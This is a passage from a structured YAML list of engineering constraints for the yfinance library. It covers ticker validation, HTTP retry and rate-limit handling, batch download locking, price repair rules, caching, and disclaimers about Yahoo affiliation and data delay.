    consequence: Passing a malformed tuple with incorrect number of elements will cause IndexError or unexpected behavior
      when unpacking MIC-based exchange targeting
    stage_ids:
    - ticker_facade
  - id: finance-C-064
    when: When initializing a Ticker with a (symbol, MIC) tuple
    action: validate that the MIC code exists in the _MIC_TO_YAHOO_SUFFIX mapping
    severity: fatal
    kind: domain_rule
    modality: must
    consequence: Invalid MIC codes will cause ValueError with unclear error message, preventing multi-market ticker resolution
      for unsupported exchanges
    stage_ids:
    - ticker_facade
  - id: finance-C-065
    when: When initializing a Ticker with any input format
    action: reject empty ticker strings with a ValueError
    severity: fatal
    kind: domain_rule
    modality: must
    consequence: Empty ticker strings will cause downstream API calls to Yahoo Finance to fail with generic errors, wasting
      network resources and producing confusing error messages
    stage_ids:
    - ticker_facade
  - id: finance-C-073
    when: When presenting yfinance as a financial data source
    action: claim affiliation with Yahoo! Inc. or present data as official Yahoo Finance data
    severity: fatal
    kind: claim_boundary
    modality: must_not
    consequence: Claiming Yahoo affiliation violates trademark policy and could result in legal action; users may also misunderstand
      data accuracy and licensing terms
    stage_ids:
    - ticker_facade
  - id: finance-C-074
    when: When claiming real-time data capability
    action: present Yahoo Finance data as real-time streaming without disclosing the inherent delay
    severity: fatal
    kind: claim_boundary
    modality: must_not
    consequence: Yahoo Finance data has 15-minute delay; presenting it as real-time could lead to trading decisions based
      on stale prices and financial losses
    stage_ids:
    - ticker_facade
  - id: finance-C-082
    when: When implementing batch ticker downloads
    action: Use the shared._LOCK around the download function call to prevent concurrent access to shared state
    severity: fatal
    kind: architecture_guardrail
    modality: must
    consequence: Without proper locking, concurrent calls to download() will corrupt shared._DFS, shared._ERRORS, and shared._TRACEBACKS
      dictionaries causing incorrect results
    stage_ids:
    - batch_download
  - id: finance-C-083
    when: When implementing batch download orchestration
    action: Reset shared._DFS, shared._ERRORS, and shared._TRACEBACKS before starting a new batch download
    severity: fatal
    kind: architecture_guardrail
    modality: must
    consequence: Stale data from previous downloads will pollute current results, causing incorrect data to be returned for
      some tickers
    stage_ids:
    - batch_download
  - id: finance-C-099
    when: When implementing Sector or Industry classes that inherit from Domain
    action: implement the _fetch_and_parse() abstract method to fetch data from Yahoo API
    severity: fatal
    kind: architecture_guardrail
    modality: must
    consequence: Domain subclass will raise NotImplementedError when accessing properties like name, symbol, or top_companies,
      breaking all downstream functionality
    stage_ids:
    - domain_entities
  - id: finance-C-114
    when: When implementing EquityQuery, FundQuery, or ETFQuery
    action: implement valid_fields and valid_values properties from QueryBase
    severity: fatal
    kind: architecture_guardrail
    modality: must
    consequence: Missing implementation raises YFNotImplementedError, breaking the query validation chain
    stage_ids:
    - screener
  - id: finance-C-129
    when: When establishing WebSocket connection
    action: Use synchronous WebSocket in async context or vice versa
    severity: fatal
    kind: architecture_guardrail
    modality: must_not
    consequence: Cross-contamination of event loop paradigms causes blocking operations that freeze the application or corrupt
      message ordering
    stage_ids:
    - live_streaming
  - id: finance-C-138
    when: When thinking async message handler error handling is optional
    action: Skip wrapping message handler calls in exception handling
    severity: fatal
    kind: rationalization_guard
    modality: must_not
    consequence: Uncaught exceptions in message handler crash the listening loop, terminating all subsequent price updates
      permanently
    stage_ids:
    - live_streaming
  - id: finance-C-140
    when: When implementing cache lookup methods
    action: check dummy flag before accessing database
    severity: fatal
    kind: domain_rule
    modality: must
    consequence: Cache lookup will fail with AttributeError or database errors if dummy flag is not checked first, causing
      crashes when cache initialization previously failed
    stage_ids:
    - caching
  - id: finance-C-141
    when: When initializing cache database connections
    action: use peewee Proxy pattern for deferred database binding
    severity: fatal
    kind: domain_rule
    modality: must
    consequence: Peewee models would fail to bind to database if created before database initialization, causing OperationalError
      on any database operation
    stage_ids:
    - caching
  - id: finance-C-155
    when: When implementing HTTP requests to Yahoo Finance API
    action: Pass curl_cffi session to HTTP layer, not requests session (requests_cache incompatible with curl_cffi)
    severity: fatal
    kind: resource_boundary
    modality: must
    consequence: HTTP requests will fail because requests_cache sessions cannot work with curl_cffi which is required for
      Yahoo API access
  - id: finance-C-188
    when: When implementing multi-ticker download operations
    action: Access the YfData singleton exclusively through its thread-safe singleton interface with locking
    severity: fatal
    kind: architecture_guardrail
    modality: must
    consequence: Direct instantiation or bypassing the singleton pattern causes cookie/crumb state inconsistency across threads,
      resulting in 401/403 authentication errors or corrupted data
  - id: finance-C-189
    when: When using yfinance data for financial decision-making
    action: Claim or imply that yfinance is affiliated with, endorsed by, or vetted by Yahoo, Inc.
    severity: fatal
    kind: claim_boundary
    modality: must_not
    consequence: Misrepresentation of the relationship with Yahoo violates trademark usage terms and may expose users to legal
      liability under Yahoo's terms of service
  regular:
  - id: finance-C-003
    when: When implementing retry logic for HTTP requests
    action: Retry without exponential backoff between attempts
    severity: high
    kind: domain_rule
    modality: must_not
    consequence: Immediate retries without backoff overwhelm Yahoo's servers, increase likelihood of triggering rate limiting
      (429 errors), and worsen overall throughput due to cascading failures
    stage_ids:
    - http_layer
  - id: finance-C-005
    when: When handling cookie consent redirects from Yahoo
    action: Accept cookie consent form when redirected to consent.yahoo.com
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Missing cookie consent acceptance causes infinite redirect loops or incomplete authentication, resulting
      in missing data fields and failed API calls
    stage_ids:
    - http_layer
  - id: finance-C-006
    when: When implementing the shared HTTP session for multiple Ticker instances
    action: Use singleton pattern for YfData to share cookies across each tickers
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Without singleton sharing, each Ticker independently fetches cookies causing redundant Yahoo API calls, faster
      rate limit exhaustion, and 5-10x slower batch operations
    stage_ids:
    - http_layer
  - id: finance-C-008
    when: When presenting Yahoo Finance data results
    action: Represent data as real-time when it has inherent delays
    severity: high
    kind: claim_boundary
    modality: must_not
    consequence: Yahoo data has delays (15+ minutes for free tier), presenting it as real-time misleads trading decisions
      and causes users to trade on stale prices
    stage_ids:
    - http_layer
  - id: finance-C-010
    when: When configuring network retry behavior
    action: Set YfConfig.network.retries >= 1 for production use
    severity: high
    kind: resource_boundary
    modality: must
    consequence: Default retries=0 means zero automatic retries for transient network failures, causing single timeout to
      immediately fail entire data fetch operations
    stage_ids:
    - http_layer
  - id: finance-C-011
    when: When implementing rate limit handling
    action: Raise YFRateLimitError for HTTP 429 responses and 'Too Many Requests' messages
    severity: high
    kind: resource_boundary
    modality: must
    consequence: Silently ignoring rate limit responses causes repeated failed requests, faster IP blocking by Yahoo, and
      extended service outages for users
    stage_ids:
    - http_layer
  - id: finance-C-012
    when: When using custom session objects with yfinance
    action: Pass the same session instance to both Ticker and YfData
    severity: high
    kind: operational_lesson
    modality: must
    consequence: Mismatched sessions cause authentication failures since YfData uses its own cookie/crumb management with
      a different session than the Ticker instance
    stage_ids:
    - http_layer
  - id: finance-C-013
    when: When implementing batch downloads with multiple tickers
    action: Share a single session across each tickers in batch operations
    severity: medium
    kind: operational_lesson
    modality: should
    consequence: Creating separate sessions per ticker exhausts Yahoo rate limits faster, causing 429 errors and slower overall
      batch download performance
    stage_ids:
    - http_layer
  - id: finance-C-014
    when: When debugging HTTP request failures
    action: Skip error investigation when hide_exceptions=True
    severity: high
    kind: rationalization_guard
    modality: must_not
    consequence: hide_exceptions=True silently suppresses errors making it impossible to diagnose intermittent Yahoo API failures,
      rate limiting, or authentication issues
    stage_ids:
    - http_layer
  - id: finance-C-016
    when: When returning price history DataFrame
    action: Set Volume column to int64 dtype after filling NaN with 0
    severity: high
    kind: domain_rule
    modality: must
    consequence: Float Volume with NaN values causes integer overflow in volume calculations and breaks downstream aggregations
      that expect integer types
    stage_ids:
    - price_history
  - id: finance-C-018
    when: When repairing prices with repair=True
    action: Add Repaired? boolean column indicating which rows were fixed, with no NaN values
    severity: high
    kind: domain_rule
    modality: must
    consequence: Missing or NaN Repaired? column prevents users from distinguishing repaired from unrepaired rows, causing
      incorrect analysis of data quality
    stage_ids:
    - price_history
  - id: finance-C-020
    when: When ticker symbol ends with =X suffix
    action: Return zero volume for FX tickers since foreign exchange markets have no volume
    severity: high
    kind: domain_rule
    modality: must
    consequence: Non-zero volume for FX tickers violates market structure assumptions and corrupts volume-based trading signals
    stage_ids:
    - price_history
  - id: finance-C-024
    when: When repairing prices with repair=True
    action: Import scipy.ndimage unless repair=True, to avoid hard dependency
    severity: medium
    kind: resource_boundary
    modality: must_not
    consequence: Unconditional scipy import adds ~2-3x latency overhead for non-repair use cases and creates unnecessary dependency
    stage_ids:
    - price_history
  - id: finance-C-025
    when: When repairing intraday intervals (1m, 2m, 5m, 15m, 30m, 60m, 90m, 1h)
    action: 'Request data older than Yahoo''s lookback limits (1m: 30 days, other intraday: 60 days, 1h: 730 days)'
    severity: high
    kind: resource_boundary
    modality: must_not
    consequence: Requests beyond Yahoo's lookback limits return empty data, causing incomplete historical reconstructions
    stage_ids:
    - price_history
  - id: finance-C-026
    when: When using repair parameter
    action: Default repair=False to avoid ~2-3x latency overhead on simple price fetches
    severity: medium
    kind: resource_boundary
    modality: must
    consequence: Enabling repair by default causes 2-3x slowdown for bulk data downloads where repair is not needed
    stage_ids:
    - price_history
  - id: finance-C-027
    when: When detecting 100x price errors in single-row DataFrames
    action: Attempt 100x error detection on single-row tables since multiple rows are needed for median comparison
    severity: high
    kind: operational_lesson
    modality: must_not
    consequence: Single-row detection produces false positives/negatives because median_filter requires at least 2 rows to
      compute local median
    stage_ids:
    - price_history
  - id: finance-C-028
    when: When processing dividend and split events
    action: Apply stock splits to interday data (1d, 1wk, 1mo, 3mo) only, not intraday data
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Stock split adjustments on intraday data produce incorrect prices because splits are daily-level events
    stage_ids:
    - price_history
  - id: finance-C-029
    when: When resampling price data to different intervals
    action: Aggregate Repaired? column using 'any' to indicate if any source row was repaired
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Using sum/min/max for Repaired? aggregation loses information about which resampled rows contain repaired
      data
    stage_ids:
    - price_history
  - id: finance-C-031
    when: When initializing TickerBase class
    action: Use lazy loading pattern for PriceHistory to defer expensive network fetch until history() is called
    severity: medium
    kind: architecture_guardrail
    modality: must
    consequence: Eager initialization of PriceHistory causes network calls during Ticker instantiation, adding 0.5-2s latency
      for simple metadata access
    stage_ids:
    - price_history
  - id: finance-C-032
    when: When repairing Adj Close values
    action: Assume Adj Close is also corrupted when Close is corrupted, since Yahoo often misadjusts both together
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Reconstructing only Close but not Adj Close causes inconsistent price series that breaks backtesting calculations
    stage_ids:
    - price_history
  - id: finance-C-033
    when: When combining price data with dividend/split events
    action: Handle ambiguous DST transition timestamps using ambiguous=True and nonexistent='shift_forward'
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Incorrect DST handling causes timestamps to be incorrectly shifted by 1 hour, corrupting time-series alignment
      between prices and events
    stage_ids:
    - price_history
  - id: finance-C-037
    when: When combining price data with dividend/split events
    action: Apply auto_adjust=True by default to replace raw OHLC with adjusted prices using Close and dividends
    severity: high
    kind: domain_rule
    modality: must
    consequence: Unadjusted prices cause incorrect historical returns calculation because stock splits and dividends distort
      price series
    stage_ids:
    - price_history
  - id: finance-C-038
    when: When fetching ticker info data from Yahoo Finance API
    action: Fetch info from both quoteSummary and quoteResponse endpoints and merge the results
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: The info dict will be incomplete, missing critical fields like marketCap, trailingPE, and dividendYield that
      require combining both API responses
    stage_ids:
    - quote_analysis
  - id: finance-C-039
    when: When parsing Yahoo Finance JSON response for info data
    action: Normalize maxAge values by converting from days to seconds when maxAge equals 1
    severity: medium
    kind: domain_rule
    modality: must
    consequence: Time-sensitive calculations relying on maxAge will use incorrect time thresholds, causing stale data detection
      failures
    stage_ids:
    - quote_analysis
  - id: finance-C-040
    when: When creating financial statement DataFrames
    action: Verify dates are parsed as datetime objects and columns are properly indexed
    severity: high
    kind: domain_rule
    modality: must
    consequence: Financial statement DataFrames will have incorrect datetime index, causing analysis functions to fail or
      produce wrong results
    stage_ids:
    - quote_analysis
  - id: finance-C-041
    when: When fetching recommendations data
    action: Return a DataFrame with columns representing period and analyst grade counts (strongBuy, buy, hold, sell, strongSell)
    severity: high
    kind: domain_rule
    modality: must
    consequence: Downstream analysis relying on recommendation trends will fail or produce unexpected results without the
      expected column structure
    stage_ids:
    - quote_analysis
  - id: finance-C-042
    when: When fetching upgrades_downgrades data
    action: Return a DataFrame with columns GradeDate, Firm, ToGrade, FromGrade, and Action
    severity: high
    kind: domain_rule
    modality: must
    consequence: Code expecting specific column names like 'ToGrade' and 'FromGrade' will fail with KeyError
    stage_ids:
    - quote_analysis
  - id: finance-C-043
    when: When processing earningsTrend data
    action: Only extract raw numeric values from the nested dict structure using 'raw' key
    severity: high
    kind: domain_rule
    modality: must
    consequence: EPS trend and other analyst estimate data will contain formatting strings instead of usable numeric values
    stage_ids:
    - quote_analysis
  - id: finance-C-044
    when: When validating module names for quoteSummary API
    action: Only accept module names that exist in the allowed quote_summary_valid_modules tuple
    severity: medium
    kind: domain_rule
    modality: must
    consequence: Invalid module requests will either fail silently or raise an exception, preventing data retrieval
    stage_ids:
    - quote_analysis
  - id: finance-C-045
    when: When fetching FastInfo data
    action: Implement lazy loading to only fetch price history when actual values are requested
    severity: medium
    kind: architecture_guardrail
    modality: must
    consequence: Every ticker instantiation will trigger expensive price history API calls even when FastInfo values are never
      accessed
    stage_ids:
    - quote_analysis
  - id: finance-C-046
    when: When accessing the quote analysis data layer
    action: Use YfData singleton as the single data entry point for each Yahoo API calls
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Multiple uncoordinated API connections may trigger Yahoo's rate limiting, causing data fetching to fail entirely
    stage_ids:
    - quote_analysis
  - id: finance-C-047
    when: When parsing JSON responses from Yahoo Finance
    action: Handle KeyError and IndexError exceptions when accessing nested quoteSummary result structures
    severity: high
    kind: domain_rule
    modality: must
    consequence: Uncaught exceptions will crash the application when Yahoo returns unexpected JSON structures
    stage_ids:
    - quote_analysis
  - id: finance-C-048
    when: When handling empty or missing data from Yahoo API
    action: Return an empty DataFrame instead of raising an exception for optional data fields
    severity: medium
    kind: domain_rule
    modality: must
    consequence: Optional data like upgrade/downgrade history will cause application crashes when no history exists
    stage_ids:
    - quote_analysis
  - id: finance-C-049
    when: When yfinance accesses Yahoo Finance public API
    action: Accept Yahoo's terms of use for data usage as an unaffiliated open-source tool
    severity: high
    kind: claim_boundary
    modality: must
    consequence: Using Yahoo Finance API without acknowledging the non-affiliation disclaimer violates usage terms and creates
      legal risk
    stage_ids:
    - quote_analysis
  - id: finance-C-050
    when: When fetching financial data from Yahoo Finance
    action: Claim that fetched data represents real-time or current market conditions without delay
    severity: high
    kind: claim_boundary
    modality: must_not
    consequence: Presenting Yahoo API data as real-time will mislead users about data freshness since Yahoo API has inherent
      latency
    stage_ids:
    - quote_analysis
  - id: finance-C-051
    when: When using yfinance for financial analysis
    action: Present analyst estimates and recommendations as guaranteed predictions
    severity: medium
    kind: claim_boundary
    modality: must_not
    consequence: Presenting analyst consensus estimates as certain outcomes will mislead users about investment risk
    stage_ids:
    - quote_analysis
  - id: finance-C-052
    when: When implementing quote analysis data fetching
    action: Use the lru_cache mechanism for cache_get to avoid redundant API calls within the same session
    severity: medium
    kind: resource_boundary
    modality: must
    consequence: Repeated API calls for the same ticker will hit Yahoo rate limits quickly and degrade performance
    stage_ids:
    - quote_analysis
  - id: finance-C-053
    when: When handling HTTP 429 rate limit responses from Yahoo API
    action: Raise YFRateLimitError to signal rate limiting occurred
    severity: high
    kind: resource_boundary
    modality: must
    consequence: Silent rate limit failures will cause data fetching to appear to succeed while returning incomplete or stale
      data
    stage_ids:
    - quote_analysis
  - id: finance-C-054
    when: When fetching financial data for delisted or invalid tickers
    action: Raise YFTickerMissingError with clear rationale about possible delisting
    severity: medium
    kind: resource_boundary
    modality: must
    consequence: Invalid tickers will return empty DataFrames silently, making debugging difficult
    stage_ids:
    - quote_analysis
  - id: finance-C-055
    when: When configuring the cookie strategy for Yahoo API
    action: Fallback to 'csrf' strategy when 'basic' strategy fails
    severity: high
    kind: operational_lesson
    modality: must
    consequence: Yahoo API access will fail entirely when the primary cookie strategy becomes invalid
    stage_ids:
    - quote_analysis
  - id: finance-C-056
    when: When handling transient network errors during data fetching
    action: Implement exponential backoff retry with configurable number of attempts
    severity: medium
    kind: operational_lesson
    modality: must
    consequence: Temporary network issues will cause data fetching to fail immediately instead of recovering automatically
    stage_ids:
    - quote_analysis
  - id: finance-C-057
    when: When processing timezone-aware price data for FastInfo
    action: Convert each timestamps to UTC then apply the exchange timezone for consistency
    severity: high
    kind: domain_rule
    modality: must
    consequence: Price calculations and comparisons will be incorrect when mixing timezone-aware and naive datetime objects
    stage_ids:
    - quote_analysis
  - id: finance-C-058
    when: When validating ticker ISIN numbers
    action: Check ISIN format is exactly 2 letters followed by 9 alphanumeric characters
    severity: medium
    kind: domain_rule
    modality: must
    consequence: Invalid ISIN numbers will be accepted, leading to incorrect securities identification
    stage_ids:
    - quote_analysis
  - id: finance-C-059
    when: When scraping valuation measures from Yahoo key-statistics page
    action: Return an empty DataFrame when the table cannot be found or parsed
    severity: medium
    kind: domain_rule
    modality: must
    consequence: Parsing failures will raise exceptions instead of gracefully returning empty data
    stage_ids:
    - quote_analysis
  - id: finance-C-060
    when: When requesting trailing frequency financial data
    action: Only allow trailing frequency for income or cash-flow data, not balance sheet
    severity: high
    kind: domain_rule
    modality: must
    consequence: Balance sheet trailing data will return incorrect or meaningless values since balance sheets represent point-in-time
      snapshots
    stage_ids:
    - quote_analysis
  - id: finance-C-061
    when: When formatting financial statement row names
    action: Apply camelCase to title case conversion with proper acronym handling for EBIT, EBITDA, EPS
    severity: low
    kind: operational_lesson
    modality: must
    consequence: Financial statement labels will remain in cryptic camelCase, reducing readability for users
    stage_ids:
    - quote_analysis
  - id: finance-C-062
    when: When initializing a Ticker with a string symbol
    action: normalize the ticker symbol to uppercase via .upper()
    severity: high
    kind: domain_rule
    modality: must
    consequence: Yahoo Finance API may not recognize lowercase or mixed-case ticker symbols, resulting in failed data retrieval
      and KeyError exceptions when accessing financial data
    stage_ids:
    - ticker_facade
  - id: finance-C-066
    when: When validating an ISIN input
    action: 'validate ISIN format matches the ISO 6166 pattern: 2-letter country code + 9 alphanumeric characters + 1 digit'
    severity: high
    kind: domain_rule
    modality: must
    consequence: Invalid ISIN formats will cause downstream ISIN-to-ticker lookups to fail or return incorrect ticker symbols,
      leading to data corruption or mismatched financial data
    stage_ids:
    - ticker_facade
  - id: finance-C-067
    when: When resolving MIC codes for multi-market tickers
    action: strip leading dots from MIC codes before lookup
    severity: high
    kind: resource_boundary
    modality: must
    consequence: MIC codes with leading dots (e.g., '.XPAR') will not match the _MIC_TO_YAHOO_SUFFIX mapping, causing ValueError
      for valid European exchange tickers
    stage_ids:
    - ticker_facade
  - id: finance-C-069
    when: When performing ISIN-to-ticker lookups
    action: cache resolved ISIN mappings in SQLite for subsequent lookups
    severity: medium
    kind: resource_boundary
    modality: must
    consequence: Without caching, repeated ISIN lookups trigger slow Business Insider scraping for each request, causing 500ms+
      delays and potential rate limiting
    stage_ids:
    - ticker_facade
  - id: finance-C-070
    when: When initializing a Ticker instance
    action: lazily load the _price_history component on first access, not during __init__
    severity: medium
    kind: architecture_guardrail
    modality: must
    consequence: Eager loading of PriceHistory during initialization causes unnecessary network calls and import overhead
      when users only need fast-access metadata like get_info()
    stage_ids:
    - ticker_facade
  - id: finance-C-071
    when: When providing backward compatibility for pandas-datareader era
    action: expose alias methods (e.g., incomestmt) that delegate to canonical method names (e.g., income_stmt)
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Without alias methods, existing codebases using old method names will break with AttributeError, requiring
      extensive refactoring
    stage_ids:
    - ticker_facade
  - id: finance-C-072
    when: When accessing financial data via Ticker properties
    action: expose each data types through property accessors on the single Ticker instance
    severity: medium
    kind: architecture_guardrail
    modality: must
    consequence: Without consistent property accessors, users must memorize different method call patterns (get_income_stmt()
      vs .income_stmt property), increasing cognitive load and API inconsistency
    stage_ids:
    - ticker_facade
  - id: finance-C-075
    when: When handling ISIN resolution failures
    action: raise ValueError with the specific ISIN when ISIN-to-ticker resolution returns empty string
    severity: high
    kind: domain_rule
    modality: must
    consequence: Silent failures or generic errors on ISIN resolution make debugging difficult; users cannot identify which
      ISIN caused the lookup to fail
    stage_ids:
    - ticker_facade
  - id: finance-C-076
    when: When normalizing MIC codes for lookup
    action: convert MIC codes to uppercase before checking against _MIC_TO_YAHOO_SUFFIX mapping
    severity: high
    kind: domain_rule
    modality: must
    consequence: Lowercase MIC codes (e.g., 'xpar' instead of 'XPAR') will not match the uppercase keys in _MIC_TO_YAHOO_SUFFIX,
      causing 'Unknown MIC code' errors for valid exchanges
    stage_ids:
    - ticker_facade
  - id: finance-C-077
    when: When handling ISIN lookups with special characters in ticker
    action: return '-' as ISIN when ticker contains '-' or '^' characters (indicating indices or special instruments)
    severity: medium
    kind: domain_rule
    modality: must
    consequence: Indices and special instruments do not have ISINs; attempting to look them up causes unnecessary network
      calls and confusing error responses
    stage_ids:
    - ticker_facade
  - id: finance-C-078
    when: When implementing batch download for multiple tickers
    action: Normalize each ticker symbols to uppercase before sending requests to Yahoo API
    severity: high
    kind: domain_rule
    modality: must
    consequence: Lowercase or mixed-case ticker symbols will cause API lookup failures since Yahoo's internal symbols are
      uppercase-only
    stage_ids:
    - batch_download
  - id: finance-C-079
    when: When downloading multiple tickers with threads=True
    action: Cap thread count at min(len(tickers), cpu_count * 2) to avoid excessive resource consumption
    severity: high
    kind: resource_boundary
    modality: must
    consequence: Exceeding the thread limit will cause resource exhaustion and degraded download performance, especially on
      systems with many CPU cores
    stage_ids:
    - batch_download
  - id: finance-C-080
    when: When DEBUG logging is enabled during batch download
    action: Use multi-threading as it causes interleaved log output that makes debugging difficult
    severity: medium
    kind: resource_boundary
    modality: must_not
    consequence: With DEBUG logging enabled, multi-threaded log messages will be interleaved making it impossible to trace
      individual ticker download sequences
    stage_ids:
    - batch_download
  - id: finance-C-081
    when: When making parallel HTTP requests to Yahoo Finance API
    action: Handle YFRateLimitError exceptions gracefully since Yahoo enforces per-IP rate limits
    severity: high
    kind: resource_boundary
    modality: must
    consequence: Uncaught rate limit errors will crash the download process, leaving partial results inaccessible and requiring
      manual retry
    stage_ids:
    - batch_download
  - id: finance-C-084
    when: When downloading tickers in parallel
    action: Store each ticker's download result in shared._DFS keyed by its uppercase ticker symbol
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Without consistent key naming (uppercase), the final DataFrame concatenation will miss data for tickers with
      non-uppercase keys
    stage_ids:
    - batch_download
  - id: finance-C-085
    when: When aggregating download results into a DataFrame
    action: Create a MultiIndex DataFrame with ticker symbols as the outer level for multi_level_index=True
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Without proper MultiIndex structure, downstream analysis cannot distinguish between different tickers' price
      columns
    stage_ids:
    - batch_download
  - id: finance-C-086
    when: When implementing threaded ticker downloads
    action: Use the @_multitasking.task decorator for the thread function to verify proper task management
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Without proper task management via @_multitasking.task, thread execution and progress tracking will not work
      correctly
    stage_ids:
    - batch_download
  - id: finance-C-087
    when: When implementing batch download
    action: Aggregate individual ticker errors into shared._ERRORS and expose them after completion
    severity: medium
    kind: architecture_guardrail
    modality: must
    consequence: Without error aggregation, developers cannot diagnose which tickers failed or why, requiring manual retry
      with single tickers
    stage_ids:
    - batch_download
  - id: finance-C-088
    when: When downloading tickers with ISIN identifiers
    action: Convert ISIN to ticker symbol before download and store the mapping for column renaming
    severity: high
    kind: domain_rule
    modality: must
    consequence: Yahoo API requires ticker symbols, not ISINs. Without conversion, the download will fail for ISIN-formatted
      inputs
    stage_ids:
    - batch_download
  - id: finance-C-089
    when: When setting ignore_tz parameter in batch download
    action: Set ignore_tz=False for intraday intervals and ignore_tz=True for daily or longer intervals by default
    severity: high
    kind: domain_rule
    modality: must
    consequence: Wrong timezone handling will cause timestamp misalignment when combining data from tickers across different
      timezones
    stage_ids:
    - batch_download
  - id: finance-C-090
    when: When returning results for a single ticker
    action: Provide option to return a simple DataFrame without MultiIndex via multi_level_index=False
    severity: low
    kind: operational_lesson
    modality: should
    consequence: Users processing single-ticker data will need unnecessary MultiIndex operations, slowing down their analysis
      pipeline
    stage_ids:
    - batch_download
  - id: finance-C-091
    when: When displaying progress during batch download
    action: Write progress bar output to stderr to avoid interfering with stdout data output
    severity: medium
    kind: operational_lesson
    modality: must
    consequence: Progress output to stdout will corrupt DataFrame output when users capture both stdout and stderr streams
    stage_ids:
    - batch_download
  - id: finance-C-092
    when: When using batch download in threaded mode
    action: Wait for each threads to complete by checking len(shared._DFS) < len(tickers) before proceeding
    severity: high
    kind: operational_lesson
    modality: must
    consequence: Returning before all tickers complete will produce incomplete DataFrames with missing columns for unfinished
      tickers
    stage_ids:
    - batch_download
  - id: finance-C-093
    when: When using batch download for historical market data
    action: Claim or imply real-time streaming capability as the download function only fetches historical data
    severity: high
    kind: claim_boundary
    modality: must_not
    consequence: Users expecting real-time data from download() will receive stale data and make trading decisions based on
      outdated prices
    stage_ids:
    - batch_download
  - id: finance-C-094
    when: When using yfinance batch download for any trading decisions
    action: Present yfinance data as official Yahoo Finance data or claim any official endorsement
    severity: high
    kind: claim_boundary
    modality: must_not
    consequence: Using Yahoo branding or claiming official endorsement violates Yahoo's terms of use and could result in legal
      liability
    stage_ids:
    - batch_download
  - id: finance-C-095
    when: When using batch download results for backtesting
    action: Claim or expect that downloaded historical data will have identical behavior to live Yahoo Finance data
    severity: medium
    kind: claim_boundary
    modality: must_not
    consequence: Yahoo's historical data API may return adjusted prices or include/exclude dividends differently than live
      queries, causing backtest/live discrepancies
    stage_ids:
    - batch_download
  - id: finance-C-096
    when: When handling DataFrame concatenation failures
    action: Call _realign_dfs() to realign DataFrames with misaligned indices before retrying concat
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Without realignment, concatenation will fail or produce NaN columns for tickers with different date ranges
    stage_ids:
    - batch_download
  - id: finance-C-097
    when: When implementing ticker input parsing
    action: Convert comma-separated string tickers to list format before processing
    severity: high
    kind: domain_rule
    modality: must
    consequence: Comma-separated input strings will be treated as single ticker names, causing download failures
    stage_ids:
    - batch_download
  - id: finance-C-098
    when: When processing timezone-aware ticker data
    action: Finalize DataFrame index by converting to datetime with UTC flag matching ignore_tz setting
    severity: high
    kind: domain_rule
    modality: must
    consequence: Without proper datetime conversion, timezone-aware timestamps may be misinterpreted causing overnight gap
      calculations to be incorrect
    stage_ids:
    - batch_download
  - id: finance-C-100
    when: When fetching domain entity data from Yahoo Finance API
    action: handle rate limiting by catching HTTP 429 status and waiting before retrying
    severity: high
    kind: resource_boundary
    modality: must
    consequence: Continued requests without respecting rate limits will result in YFRateLimitError, preventing access to sector
      and industry data
    stage_ids:
    - domain_entities
  - id: finance-C-101
    when: When parsing top companies data from Yahoo Finance API response
    action: return None when the top_companies list is empty, not an empty DataFrame
    severity: medium
    kind: domain_rule
    modality: must
    consequence: Returning an empty DataFrame instead of None causes inconsistent return types that break downstream type
      checking and comparison logic
    stage_ids:
    - domain_entities
  - id: finance-C-102
    when: When accessing domain entity properties like name, symbol, overview, or top_companies
    action: trigger lazy data fetching via _ensure_fetched() before returning the attribute
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Properties will return None even after data is fetched externally, causing missing data for all domain entity
      queries
    stage_ids:
    - domain_entities
  - id: finance-C-103
    when: When constructing DataFrame columns for domain entity data
    action: 'use consistent column names across each DataFrame returns: ''symbol'' as index, and lowercase space-separated
      names for data columns'
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Inconsistent column names break downstream analysis code that expects uniform DataFrame structure across
      sector, industry, and company data
    stage_ids:
    - domain_entities
  - id: finance-C-104
    when: When implementing the Sector class industries property
    action: filter out 'each Industries' entries from the API response to maintain data quality
    severity: medium
    kind: domain_rule
    modality: must
    consequence: Including 'All Industries' placeholder entry pollutes industry DataFrames with invalid data that doesn't
      correspond to actual industries
    stage_ids:
    - domain_entities
  - id: finance-C-105
    when: When fetching sector or industry data from Yahoo Finance
    action: gracefully handle API failures by logging errors and suppressing exceptions when YfConfig.debug.hide_exceptions
      is True
    severity: high
    kind: operational_lesson
    modality: must
    consequence: Unhandled exceptions will crash applications using yfinance for sector/industry data during Yahoo API downtime
    stage_ids:
    - domain_entities
  - id: finance-C-106
    when: When using SECTOR_INDUSTY_MAPPING for sector/industry validation or documentation
    action: use the hardcoded mapping from const.py instead of relying solely on Yahoo API for sector-industry relationships
    severity: high
    kind: resource_boundary
    modality: must
    consequence: Yahoo API changes to sector-industry classifications break code that dynamically discovers relationships
      without fallback mapping
    stage_ids:
    - domain_entities
  - id: finance-C-107
    when: When constructing query URLs for sector and industry data
    action: 'use the correct URL pattern: /v1/finance/sectors/{key} for sectors and /v1/finance/industries/{key} for industries'
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Incorrect URL patterns result in 404 errors from Yahoo API, making all sector and industry queries fail
    stage_ids:
    - domain_entities
  - id: finance-C-108
    when: When presenting sector or industry data to users
    action: claim that the data represents real-time or official financial advice
    severity: high
    kind: claim_boundary
    modality: must_not
    consequence: Presenting Yahoo Finance data as real-time or official financial advice violates Yahoo's terms of use and
      misleads users about data reliability
    stage_ids:
    - domain_entities
  - id: finance-C-109
    when: When initializing Industry class
    action: reinitialize YfData instance that was already initialized in parent Domain class
    severity: medium
    kind: architecture_guardrail
    modality: must_not
    consequence: Creating a duplicate YfData instance wastes resources and may cause inconsistent session management across
      domain entity operations
    stage_ids:
    - domain_entities
  - id: finance-C-110
    when: When parsing industry or sector overview data
